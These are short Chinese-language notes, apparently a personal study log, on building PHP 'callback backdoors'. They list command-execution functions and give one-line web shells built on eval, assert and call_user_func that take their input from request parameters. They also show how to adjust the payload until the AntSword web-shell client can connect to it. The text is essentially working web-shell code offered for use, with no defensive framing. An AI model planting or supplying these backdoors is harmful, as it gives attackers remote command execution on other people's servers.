PHP回调后门
1.系统命令执行 直接windows或liunx命令 各个程序 相应的函数 来实现
system exec shell_Exec passshru
2.执行代码 eval assert php代码 系统
<?php eval($_POST)
<?php assert($_POST)
简单的测试
回调后门函数call_user_func(1,2)
1是回调的函数
2是回调的参数
<?php
call_user_func('assert',$_REQUEST['pass']);可以接get,post传参
这样一个函数可以执行我们的命令
可以执行我们的php代码就可以执行系统命令
那我们考虑如何执行我们的后门
执行一句话pass传入
$_POST[123]
就会形成
assert($_POST[123])
用antsword进行连接尝试这个后门是否可以执行
但是用这个一句话执行不了
经过查阅发现assert是可以执行函数而不可以直接执行$_POST[123]
所以我们可以改一下
assert(eval($_POST[123])
这样antsword就可以执行